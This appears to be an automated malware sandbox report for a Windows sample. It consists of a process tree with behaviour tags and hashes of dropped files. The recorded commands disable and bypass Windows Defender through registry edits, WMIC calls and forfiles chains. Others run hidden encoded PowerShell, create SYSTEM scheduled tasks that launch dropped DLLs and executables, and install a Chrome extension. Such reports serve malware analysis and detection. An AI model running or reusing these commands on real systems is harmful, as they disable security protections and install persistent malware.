C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtTPlVLhSaUn" /t REG_DWORD /d 0 /reg:324⤵PID:1856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtTPlVLhSaUn" /t REG_DWORD /d 0 /reg:644⤵PID:2100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OOuPExCnaYTU2" /t REG_DWORD /d 0 /reg:324⤵PID:2928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OOuPExCnaYTU2" /t REG_DWORD /d 0 /reg:644⤵PID:2036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpUBPkkqU" /t REG_DWORD /d 0 /reg:324⤵PID:2484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpUBPkkqU" /t REG_DWORD /d 0 /reg:644⤵PID:884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR" /t REG_DWORD /d 0 /reg:324⤵PID:2324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR" /t REG_DWORD /d 0 /reg:644⤵PID:1936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tQtOyvtwIjTyC" /t REG_DWORD /d 0 /reg:324⤵PID:2140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tQtOyvtwIjTyC" /t REG_DWORD /d 0 /reg:644⤵PID:1496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HNIqBcslfBUMDlVB" /t REG_DWORD /d 0 /reg:324⤵PID:2172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HNIqBcslfBUMDlVB" /t REG_DWORD /d 0 /reg:644⤵PID:2468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:1500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC" /t REG_DWORD /d 0 /reg:324⤵PID:2588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC" /t REG_DWORD /d 0 /reg:644⤵PID:2636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:324⤵PID:3060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:644⤵PID:3056
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gPHGDuQOr" /SC once /ST 13:05:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gPHGDuQOr"3⤵PID:2252
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gPHGDuQOr"3⤵PID:1980
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1236
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1704
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1652
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcaOKtldTodyQokzi" /SC once /ST 14:49:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\xWvzdveufkqfSjMY\GlZDwMGWQlYkIIu\lFVhvJd.exe\" E0 /yMnXdidpf 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1420
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcaOKtldTodyQokzi"3⤵PID:636
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 3043⤵
- Loads dropped DLL
- Program crash
PID:1756
-
-
-
C:\Windows\Temp\xWvzdveufkqfSjMY\GlZDwMGWQlYkIIu\lFVhvJd.exeC:\Windows\Temp\xWvzdveufkqfSjMY\GlZDwMGWQlYkIIu\lFVhvJd.exe E0 /yMnXdidpf 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1904
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2356
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1248
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2932
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:2340
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2856
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:1528
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:3036
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2920
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:1568
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:1288
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1516
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:572
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:1484
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1476
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2464
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bLzeoVMxrLqUlFeJJd"3⤵PID:2372
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:1056
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:552
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:1012
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2040
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2908
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\mpUBPkkqU\VozrYz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "WDtolTrtWazUMxY" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:264
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WDtolTrtWazUMxY2" /F /xml "C:\Program Files (x86)\mpUBPkkqU\AsvKbsK.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "WDtolTrtWazUMxY"3⤵PID:2356
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WDtolTrtWazUMxY"3⤵PID:1488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZWXOZUeuJXYTDm" /F /xml "C:\Program Files (x86)\OOuPExCnaYTU2\saHZAgb.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WcUYmDlAoBbmM2" /F /xml "C:\ProgramData\HNIqBcslfBUMDlVB\rwOiMJV.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nkuCsTJKypmxURcwD2" /F /xml "C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR\ksWCxtc.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dIhZtjcxirnwDOJOLwq2" /F /xml "C:\Program Files (x86)\tQtOyvtwIjTyC\rbmjKrt.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ffSBZYZjRJDDYrjLt" /SC once /ST 07:14:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\xWvzdveufkqfSjMY\OZNSJZhZ\ICBZirJ.dll\",#1 /FodideEp 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ffSBZYZjRJDDYrjLt"3⤵PID:1004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcaOKtldTodyQokzi"3⤵PID:1708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2056 -s 15163⤵
- Loads dropped DLL
- Program crash
PID:2420
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\xWvzdveufkqfSjMY\OZNSJZhZ\ICBZirJ.dll",#1 /FodideEp 5254032⤵PID:2928
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\xWvzdveufkqfSjMY\OZNSJZhZ\ICBZirJ.dll",#1 /FodideEp 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2384 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ffSBZYZjRJDDYrjLt"4⤵PID:2456
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F74D9964-E733-43A4-B868-A387933C98AF} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]1⤵PID:1468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1504 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2384
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1608
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2724 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2504
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1552
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2412
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2972
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5604488d42809b63a84089dd3bbe30314
SHA102a8a356aefafcffc5d21e97bc8156d5759e9b2a
SHA256d93a23107f0e8296c6d59c647e28e40e25eed9cbc8a7c159951d5e4b49f7f3ec
SHA5122cabc80a92445e2f8347f77ff7432fd197411f47461793995dbe071bee87342e625f82fcfd63fce39b4549dd274057f98ac0fde205028b6d1909e701517e2879
-
Filesize
2KB
MD5b59794195ded011d9f9d97f74bb3d936
SHA14cf5759d1084e39f92d74fe4e739f23af3b3e242
SHA2562a6211864798d64c28d5ddabaf49451364cec18356adeffeb254861ac4ef3a7b
SHA5124a799e885aa443826a0c4418588b22e9150fc1569ec7d73511ae3ce2110e62f8910fd232386ed8bf299d376a43bb1daea851e019c233f9cf82bcd6185ed5b2aa
-
Filesize
2KB
MD527d567ab8335a0882deb0c52d49123a1
SHA16d95ad79508e31148a4618e0095419396edd95b2
SHA25616cd4a5df5aed06827ea97e3529cfe36e17d4255eff1c9fd774095b15e3629bb
SHA512345dfe4e4fdef4ac1a3b6928e8cfbabcae6334cc1d70c6ff93a12a1eea6c3f39704a4d28e70fda55ee30d45bad2fa0c6c2a1dcddcf2788551b05ba40043ff027
-
Filesize
2KB
MD52a9a11e8ff2a7c16ab2edae6cdbf8884
SHA10857df6f2cacece633cfb4eea425ed1f898ce3fb
SHA2566a972ca7244ae5cb16cedc22a01c9d1c34b5b466d12e49d68371f7af87892da3
SHA5128a27d1db2b0959e546afdc9c13d39e4c6fc41649c76c973c9cbe79b1085674936da5c63310e49251d2b8d82a653f7dbb4ca6d7c56d75dacbb4364770a8e8fe8a
-
Filesize
2.0MB
MD5e103e73ac3caf6b7044ea430da3f2e02
SHA1361eb95df29486bce5d3eb452570b173839a6d11
SHA25607d5eed3989b24c16130c3223b9ce90fa8ddb5da4d403fab2308254a965a3051
SHA512b5f8498c69c79fdfb2b99499bd9c6d26672fd811a598582d5c733ddf180e2d39c965ee5a2fa79e37c362bbfd4eb980b282a46a7bf15d2b22dbcb930ab455238e
-
Filesize
2KB
MD55d7abfbe01e0af1a7eb20ea28c2a934a
SHA1088270a7fb804a3135c3924f0042f26bb3e961e6
SHA25679173252979342cc3042f0f5e6b103c0a4744d4eb5ed0ebb2496a7b30bdb1e44
SHA512ea637c0b091803a633a754fb82e8003c4e12799d3341e838e0b904855ef38a6b86d7d595b0487b04baad0b99301f40c6daa89198b84b9ce07bc846f6c63c9b95
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD580c58d73127adb850691f649cddfab9a
SHA1cd0c9a962a3cf9f875cbca8faf38cef9a4964a4b
SHA256dee6506c9774162e808e26b60be4c534f873b45d6e77835e5e26c1c2c20fa0eb
SHA512096c9644a6e5f2ae715544535a82e4c629587f2477f07956c515cd7aee689f1de2f0bacdcca9f84e0b8c21cb9297c73f878b0d72acc80f7619823e4c9c79f168
-
Filesize
6.6MB
MD5e45504c1689e0aff819cdec54111bd2e
SHA17de85cff27360c6e511c98e115cf31a6b9932caa
SHA256fc436906afe63c767ecffcd268a4df7ce1777d3f48cafecf84baeea54cb41f71
SHA51289786b54916e8e9dc6b8ffe649572c5de75ae5c518ade084366c92844ae54d7349b2018a5f60e5c8df2a24653b5249587c49ef60090992b7bbf5c758e555835a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d3302d0df044dd838db7df6a70a077c2
SHA10d85fce92cc24398d55d62fee11c88411fae70c5
SHA25665c1b39f3444fe1afe6ece63b57a4b944ed68247f26809847e45aaeb0a244f27
SHA51235f8aa0b0a4aa369f14c445404295049f6a38bb1db7406926a9653e61d67f5691ff3a3873dcaaca066c35604e199df731384c75f2b30c426bd8f245d5d699f9f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD56cf57290351c40098f170e1be9d450be
SHA1f757d90c86c8e72bc7d2c7831ccc55e5463852b2
SHA256f12ee7cc39b8891d1f819e526cc0d97ac4d9c9f55e69d005fdfe96da33e21044
SHA512d32a64b1365b7bd2c9dbaab424b0c3f6ca9efb9a3432be276b5fb30b4cbe67ed3973b245bad292c508cca389b52ee7a2968b3b1a026d400d3ef3c4578183b6e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5aa2bd06665575a0c266c540326844a5a
SHA11ec2e011299340c1801c694651242a5658a94dce
SHA256b6e2210e2ef67b98e05e38517322bfb1aec2cbc0b8e354d1c226b8159cd72a3f
SHA51232c1be32f32de8f0eb76cbc38ac62a9cd657afcf3adceb3ac252ffa63ec86da483592d08d3d727c2059cea1926d64fbef2dc2ab57450be606eb4058c85ef026c
-
Filesize
7KB
MD5f4dea51f57a117dced20f71fd046a038
SHA1221e6ed7d33c3ca337f87469f4f562bc97712613
SHA2564657e80c72474e6b5ba5c888f4ffd6d6065d7b5d3f3c3cf096a95c6a717033a3
SHA51202bdf8a2bcd85d3beb4c1df6b436a5e8b8b4d29b93d8eebea43bfb1dfbd7eebf47bff895aaafb0ee1df0d8ccc65d75b7846563cf2d5b97dc82c9b5d541a96413
-
Filesize
6.3MB
MD5dd1dce6e3e1640eca5466393ee3bd774
SHA18e91f2193b3982d475ff78727d3e1609b594f550
